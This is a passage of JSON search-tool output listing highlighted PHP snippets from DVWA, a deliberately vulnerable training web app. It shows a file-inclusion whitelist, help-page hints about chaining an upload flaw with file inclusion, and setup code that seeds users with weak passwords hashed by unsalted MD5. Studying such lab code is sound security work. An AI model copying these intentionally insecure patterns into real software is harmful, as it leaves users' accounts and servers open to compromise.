"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> The page we wish <span class=\"token keyword\">to</span> display\n<span class=\"line-number\">4:</span> <span class=\"token variable\">$file</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'page'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">5:</span> \n<span class=\"highlight\"><span class=\"line-number\">6:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Only allow include<span class=\"token punctuation\">.</span>php <span class=\"token operator\">or</span> file{<span class=\"token number\">1</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token number\">3</span>}<span class=\"token punctuation\">.</span>php</span>\n<span class=\"line-number\">7:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$file</span> !<span class=\"token operator\">=</span> <span class=\"token string\">\"include.php\"</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token variable\">$file</span> !<span class=\"token operator\">=</span> <span class=\"token string\">\"file1.php\"</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token variable\">$file</span> !<span class=\"token operator\">=</span> <span class=\"token string\">\"file2.php\"</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token variable\">$file</span> !<span class=\"token operator\">=</span> <span class=\"token string\">\"file3.php\"</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> This isn't the page we want!\n<span class=\"line-number\">9:</span> \techo <span class=\"token string\">\"ERROR: File not found!\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token keyword\">exit</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> }",
"line": 6,
"start": 1,
"end": 12,
"severity": "unknown",
"note": ""
},
{
"id": 250,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/help/help.php",
"filetype": "php",
"search": "\\sinclude",
"match": "<span class=\"line-number\">31:</span> \t\t<span class=\"token operator\"><</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\"><</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span>Worth looking <span class=\"token keyword\">for</span> any restrictions within any <span class=\"token string\">\"hidden\"</span> form fields<span class=\"token operator\"><</span><span class=\"token operator\">/</span>span<span class=\"token operator\">></span><span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>pre<span class=\"token operator\">></span>\n<span class=\"line-number\">32:</span> \n<span class=\"line-number\">33:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">34:</span> \n<span class=\"line-number\">35:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>High Level<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">36:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>Once the file has been received from the client<span class=\"token punctuation\">,</span> the server will try <span class=\"token keyword\">to</span> resize any image that was included <span class=\"token keyword\">in</span> the request<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">37:</span> \t\t<span class=\"token operator\"><</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\"><</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span>need <span class=\"token keyword\">to</span> link <span class=\"token keyword\">in</span> another vulnerability<span class=\"token punctuation\">,</span> such as file includion<span class=\"token operator\"><</span><span class=\"token operator\">/</span>span<span class=\"token operator\">></span><span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>pre<span class=\"token operator\">></span>\n<span class=\"line-number\">38:</span> \n<span class=\"line-number\">39:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">40:</span> \n<span class=\"line-number\">41:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>Impossible Level<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>",
"line": 36,
"start": 31,
"end": 42,
"severity": "unknown",
"note": ""
},
{
"id": 3,
"file": "/home/chris/src/DVWA-master/dvwa/includes/DBMS/MySQL.php",
"filetype": "php",
"search": "\\sinsert",
"match": "<span class=\"line-number\">39:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">40:</span> }\n<span class=\"line-number\">41:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"'users' table was created.\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">42:</span> \n<span class=\"line-number\">43:</span> \n<span class=\"highlight\"><span class=\"line-number\">44:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Insert some data into users</span>\n<span class=\"line-number\">45:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get the base directory <span class=\"token keyword\">for</span> the avatar media<span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span>\n<span class=\"line-number\">46:</span> <span class=\"token variable\">$baseUrl</span> <span class=\"token operator\">=</span> <span class=\"token string\">'http://'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'SERVER_NAME'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'PHP_SELF'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">47:</span> <span class=\"token variable\">$stripPos</span> <span class=\"token operator\">=</span> <span class=\"token function\">strpos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$baseUrl</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'setup.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">48:</span> <span class=\"token variable\">$baseUrl</span> <span class=\"token operator\">=</span> <span class=\"token function\">substr</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$baseUrl</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$stripPos</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'hackable/users/'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">49:</span> ",
"line": 44,
"start": 39,
"end": 50,
"severity": "unknown",
"note": ""
},
{
"id": 4,
"file": "/home/chris/src/DVWA-master/dvwa/includes/DBMS/MySQL.php",
"filetype": "php",
"search": "\\sinsert",
"match": "<span class=\"line-number\">52:</span> \t<span class=\"token punctuation\">(</span><span class=\"token string\">'2'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Gordon'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Brown'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'gordonb'</span><span class=\"token punctuation\">,</span><span class=\"token function\">MD5</span><span class=\"token punctuation\">(</span><span class=\"token string\">'abc123'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token string\">'{$baseUrl}gordonb.jpg'</span><span class=\"token punctuation\">,</span> <span class=\"token function\">NOW</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'0'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">53:</span> \t<span class=\"token punctuation\">(</span><span class=\"token string\">'3'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Hack'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Me'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'1337'</span><span class=\"token punctuation\">,</span><span class=\"token function\">MD5</span><span class=\"token punctuation\">(</span><span class=\"token string\">'charley'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token string\">'{$baseUrl}1337.jpg'</span><span class=\"token punctuation\">,</span> <span class=\"token function\">NOW</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'0'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">54:</span> \t<span class=\"token punctuation\">(</span><span class=\"token string\">'4'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Pablo'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Picasso'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'pablo'</span><span class=\"token punctuation\">,</span><span class=\"token function\">MD5</span><span class=\"token punctuation\">(</span><span class=\"token string\">'letmein'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token string\">'{$baseUrl}pablo.jpg'</span><span class=\"token punctuation\">,</span> <span class=\"token function\">NOW</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'0'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">55:</span> \t<span class=\"token punctuation\">(</span><span class=\"token string\">'5'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Bob'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Smith'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'smithy'</span><span class=\"token punctuation\">,</span><span class=\"token function\">MD5</span><span class=\"token punctuation\">(</span><span class=\"token string\">'password'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token string\">'{$baseUrl}smithy.jpg'</span><span class=\"token punctuation\">,</span> <span class=\"token function\">NOW</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'0'</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">56:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">57:</span> \t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data could not be inserted into 'users' table<br />SQL: \"</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">58:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">59:</span> }\n<span class=\"line-number\">60:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data inserted into 'users' table.\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">61:</span> \n<span class=\"line-number\">62:</span> ",
"line": 57,
"start": 52,
"end": 63,
"severity": "unknown",
"note": ""
},
{
"id": 5,
"file": "/home/chris/src/DVWA-master/dvwa/includes/DBMS/MySQL.php",
"filetype": "php",
"search": "\\sinsert",
"match": "<span class=\"line-number\">55:</span> \t<span class=\"token punctuation\">(</span><span class=\"token string\">'5'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Bob'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Smith'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'smithy'</span><span class=\"token punctuation\">,</span><span class=\"token function\">MD5</span><span class=\"token punctuation\">(</span><span class=\"token string\">'password'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token string\">'{$baseUrl}smithy.jpg'</span><span class=\"token punctuation\">,</span> <span class=\"token function\">NOW</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'0'</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">56:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">57:</span> \t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data could not be inserted into 'users' table<br />SQL: \"</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">58:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">59:</span> }\n<span class=\"highlight\"><span class=\"line-number\">60:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data inserted into 'users' table.\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">61:</span> \n<span class=\"line-number\">62:</span> \n<span class=\"line-number\">63:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Create guestbook table\n<span class=\"line-number\">64:</span> <span class=\"token variable\">$create_tb_guestbook</span> <span class=\"token operator\">=</span> \"CREATE TABLE guestbook <span class=\"token punctuation\">(</span>comment_id SMALLINT UNSIGNED <span class=\"token operator\">NOT</span> <span class=\"token keyword\">NULL</span> AUTO_INCREMENT<span class=\"token punctuation\">,</span> comment <span class=\"token function\">varchar</span><span class=\"token punctuation\">(</span><span class=\"token number\">300</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> name <span class=\"token function\">varchar</span><span class=\"token punctuation\">(</span><span class=\"token number\">100</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> PRIMARY KEY <span class=\"token punctuation\">(</span>comment_id<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">65:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$create_tb_guestbook</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {",
"line": 60,
"start": 55,
"end": 66,
"severity": "unknown",
"note": ""
},
{
"id": 6,
"file": "/home/chris/src/DVWA-master/dvwa/includes/DBMS/MySQL.php",
"filetype": "php",
"search": "\\sinsert",
"match": "<span class=\"line-number\">67:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">68:</span> }\n<span class=\"line-number\">69:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"'guestbook' table was created.\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">70:</span> \n<span class=\"line-number\">71:</span> \n<span class=\"highlight\"><span class=\"line-number\">72:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Insert data into <span class=\"token string\">'guestbook'</span></span>\n<span class=\"line-number\">73:</span> <span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> \"INSERT INTO guestbook VALUES <span class=\"token punctuation\">(</span><span class=\"token string\">'1'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'This is a test comment.'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'test'</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">74:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">75:</span> \t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data could not be inserted into 'guestbook' table<br />SQL: \"</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">76:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">77:</span> }",
"line": 72,
"start": 67,
"end": 78,
"severity": "unknown",
"note": ""
},
{
"id": 7,
"file": "/home/chris/src/DVWA-master/dvwa/includes/DBMS/MySQL.php",
"filetype": "php",
"search": "\\sinsert",
"match": "<span class=\"line-number\">70:</span> \n<span class=\"line-number\">71:</span> \n<span class=\"line-number\">72:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Insert data into <span class=\"token string\">'guestbook'</span>\n<span class=\"line-number\">73:</span> <span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> \"INSERT INTO guestbook VALUES <span class=\"token punctuation\">(</span><span class=\"token string\">'1'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'This is a test comment.'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'test'</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">74:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">75:</span> \t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data could not be inserted into 'guestbook' table<br />SQL: \"</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">76:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">77:</span> }\n<span class=\"line-number\">78:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data inserted into 'guestbook' table.\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">79:</span> \n<span class=\"line-number\">80:</span> ",
"line": 75,
"start": 70,
"end": 81,
"severity": "unknown",
"note": ""
},
{
"id": 8,
"file": "/home/chris/src/DVWA-master/dvwa/includes/DBMS/MySQL.php",
"filetype": "php",
"search": "\\sinsert",
"match": "<span class=\"line-number\">73:</span> <span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> \"INSERT INTO guestbook VALUES <span class=\"token punctuation\">(</span><span class=\"token string\">'1'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'This is a test comment.'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'test'</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">74:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">75:</span> \t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data could not be inserted into 'guestbook' table<br />SQL: \"</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">76:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">77:</span> }\n<span class=\"highlight\"><span class=\"line-number\">78:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data inserted into 'guestbook' table.\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">79:</span> \n<span class=\"line-number\">80:</span> \n<span class=\"line-number\">81:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Done\n<span class=\"line-number\">82:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"<em>Setup successful</em>!\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">83:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">dvwaIsLoggedIn</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>",
"line": 78,
"start": 73,
"end": 84,
"severity": "unknown",
"note": ""
},
{
"id": 9,
"file": "/home/chris/src/DVWA-master/dvwa/includes/DBMS/PGSQL.php",
"filetype": "php",
"search": "\\sinsert",
